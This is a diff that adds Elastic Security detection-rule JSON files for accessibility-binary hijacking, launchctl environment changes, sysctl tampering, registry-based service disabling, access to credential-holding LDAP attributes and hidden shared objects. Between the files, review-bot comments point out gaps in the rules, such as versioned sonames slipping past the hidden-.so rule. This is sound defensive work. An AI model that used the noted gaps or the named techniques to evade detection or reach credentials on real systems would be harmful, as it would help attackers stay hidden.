Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.pe.original_file_name : \"?*\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", + "references": [ + "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.008", + "name": "Accessibility Features", + "reference": "https://attack.mitre.org/techniques/T1546/008/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.008", + "name": "Accessibility Features", + "reference": "https://attack.mitre.org/techniques/T1546/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + 
"id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_106.json b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_106.json new file mode 100644 index 00000000000..4790539e787 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_106.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to an environment variable using the built-in launchctl command. Adversaries may execute their own malicious payloads by hijacking certain environment variables to load arbitrary libraries or bypass certain restrictions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Modification of Environment Variable via Launchctl", + "query": "event.category:process and host.os.type:macos and event.type:start and \n process.name:launchctl and \n process.args:(setenv and not (ANT_HOME or \n DBUS_LAUNCHD_SESSION_BUS_SOCKET or \n EDEN_ENV or \n LG_WEBOS_TV_SDK_HOME or \n RUNTIME_JAVA_HOME or \n WEBOS_CLI_TV or \n JAVA*_HOME) and \n not *.vmoptions) and \n not process.parent.executable:(\"/Applications/IntelliJ IDEA CE.app/Contents/jbr/Contents/Home/lib/jspawnhelper\" or \n /Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin or \n /Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin or \n /usr/local/bin/kr)\n", + "references": [ + "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/osx/escalate/tccbypass.rb" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration 
Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.007", + "name": "Path Interception by PATH Environment Variable", + "reference": "https://attack.mitre.org/techniques/T1574/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_106.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_106.json new file mode 100644 index 00000000000..ee25b01c833 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_106.json 
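Review bot: The `process.parent.executable` exclusion in `query` lists `/Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin` twice; the duplicate is harmless to KQL but indicates the list was not de-duplicated before export, so one entry should go. The `not *.vmoptions` clause sits inside the `process.args:( ... )` group, so it suppresses the alert whenever any argument value ends in `.vmoptions`, which is wider than the single IDE case it appears to target; anchoring that exception on the parent executable (as the IntelliJ `jspawnhelper` entry already does) keeps the exclusion tied to the process rather than to an argument shape. The reference URL also contains a doubled slash (`blob/master//modules/...`), which is worth normalising to `blob/master/modules/...`.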
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Monitors file events on sysctl configuration files (e.g., /etc/sysctl.conf, /etc/sysctl.d/*.conf) to identify potential unauthorized access or manipulation of system-level configuration settings. Attackers may tamper with the sysctl configuration files to modify kernel parameters, potentially compromising system stability, performance, or security.", + "from": "now-119m", + "history_window_start": "now-7d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Sysctl File Event", + "new_terms_fields": [ + "host.id", + "process.executable", + "file.path" + ], + "query": "host.os.type:linux and event.category:file and event.action:(\"opened-file\" or \"read-file\" or \"wrote-to-file\") and\nfile.path : (\"/etc/sysctl.conf\" or \"/etc/sysctl.d\" or /etc/sysctl.d/*) and\nnot process.name:(dpkg or dockerd or unattended-upg)\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 106 + }, + "id": "7592c127-89fb-4209-a8f6-f9944dfd7e02_106", + "type": "security-rule" +} \ No newline at end of file 
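Review bot: The `setup` text instructs users to add `-w /etc/sysctl.conf -p wa -k sysctl` and `-w /etc/sysctl.d -p wa -k sysctl`, which audit only write and attribute-change access, yet the `query` also matches `event.action:("opened-file" or "read-file" ...)`; with those watch rules the read branches never receive events, so either the setup should use `-p rwa` or the query should drop the read actions so the documented configuration and the rule agree. The same mismatch is present in the version 107 file of this rule added later in this diff. A one-line remark in `setup` on the expected event volume of watching reads would also help, since `-p r` on `/etc/sysctl.d` fires on every boot-time read by `systemd-sysctl`.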
diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_107.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_107.json new file mode 100644 index 00000000000..de8011a6e1c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_107.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Monitors file events on sysctl configuration files (e.g., /etc/sysctl.conf, /etc/sysctl.d/*.conf) to identify potential unauthorized access or manipulation of system-level configuration settings. Attackers may tamper with the sysctl configuration files to modify kernel parameters, potentially compromising system stability, performance, or security.", + "from": "now-119m", + "history_window_start": "now-14d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Sysctl File Event", + "new_terms_fields": [ + "host.id", + "process.executable" + ], + "query": "host.os.type:linux and event.category:file and event.action:(\"opened-file\" or \"read-file\" or \"wrote-to-file\") and\nfile.path : (\"/etc/sysctl.conf\" or \"/etc/sysctl.d\" or /etc/sysctl.d/*) and not process.name:(\n dpkg or dockerd or unattended-upg or systemd-sysctl or python* or auditbeat or dpkg or grep or pool*\n)\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. 
It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 107 + }, + "id": "7592c127-89fb-4209-a8f6-f9944dfd7e02_107", + "type": "security-rule" +} \ No newline at end of file 
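Review bot: The `process.name` exclusion in `query` lists `dpkg` twice and adds the wildcard patterns `python*` and `pool*`; a wildcard on `process.name` exempts every interpreter- or pool-named process, which is broad for a building-block rule about configuration tampering because any scripted edit of `/etc/sysctl.conf` driven by Python is no longer surfaced. Drop the duplicate, and consider replacing the wildcard names with the specific `process.executable` values observed during tuning (the `new_terms_fields` already key on `process.executable`), or at least state in `description` that interpreter-driven changes are out of scope for this version.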
diff --git a/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_2.json b/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_2.json new file mode 100644 index 00000000000..e4545254534 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_2.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies attempts to modify services start settings using processes other than services.exe. Attackers may attempt to modify security and monitoring services to avoid detection or delay response.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Service Disabled via Registry Modification", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\"\n ) and registry.data.strings : (\"3\", \"4\") and\n not \n (\n process.name : \"services.exe\" and user.id : \"S-1-5-18\"\n )\n and not registry.path : \"HKLM\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\MrxSmb10\\\\Start\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "75dcb176-a575-4e33-a020-4a52aaa1b593", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": 
"https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "75dcb176-a575-4e33-a020-4a52aaa1b593_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_10.json b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_10.json new file mode 100644 index 00000000000..ddb009c9d9a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_10.json 
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identify access to sensitive Active Directory object attributes that contains credentials and decryption keys such as unixUserPassword, ms-PKI-AccountCredentials and msPKI-CredentialRoamingTokens.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Access to a Sensitive LDAP Attribute", + "query": "any where event.action == \"Directory Service Access\" and event.code == \"4662\" and\n\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n\n winlog.event_data.Properties : (\n /* unixUserPassword */\n \"*612cb747-c0e8-4f92-9221-fdd5f15b550d*\",\n\n /* ms-PKI-AccountCredentials */\n \"*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*\",\n\n /* ms-PKI-DPAPIMasterKeys */\n \"*b3f93023-9239-4f7c-b99c-6745d87adbc2*\",\n\n /* msPKI-CredentialRoamingTokens */\n \"*b7ff5a38-0818-42b0-8110-d3d154c97f24*\"\n ) and\n\n /*\n Excluding noisy AccessMasks\n 0x0 undefined and 0x100 Control Access\n https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\n */\n not winlog.event_data.AccessMask in (\"0x0\", \"0x100\")\n", + "references": [ + "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", + "https://social.technet.microsoft.com/wiki/contents/articles/11483.windows-credential-roaming.aspx", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMask", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.Properties", + 
"type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66", + "setup": "## Setup\n\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.004", + "name": "Private Keys", + "reference": "https://attack.mitre.org/techniques/T1552/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 10 + }, + "id": 
"764c9fcd-4c4c-41e6-a0c7-d6c46c2eff66_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_109.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_109.json new file mode 100644 index 00000000000..a846adbdcc9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_109.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a \".\" as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Creation of Hidden Shared Object File", + "query": "file where host.os.type == \"linux\" and event.type == \"creation\" and file.extension == \"so\" and file.name : \".*.so\" and\nnot process.name == \"dockerd\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "766d3f91-3f12-448c-b65f-20123e9e9e8c_109", + "type": "security-rule" +} \ No newline at end of file 
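Review bot: The query's `file.extension == "so" and file.name : ".*.so"` pair only fires on hidden files whose name ends in `.so`, so a dotfile carrying a versioned soname such as `.libx.so.1` (extension `1`) passes silently, and that is the naming most real shared objects on Linux use, which makes the bypass cheap. Consider widening the name clause to `file.name : (".*.so", ".*.so.*")` and dropping or relaxing the extension clause so the two conditions do not contradict each other. The `_110` copy added in the same diff carries the identical query, so the same gap applies there.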
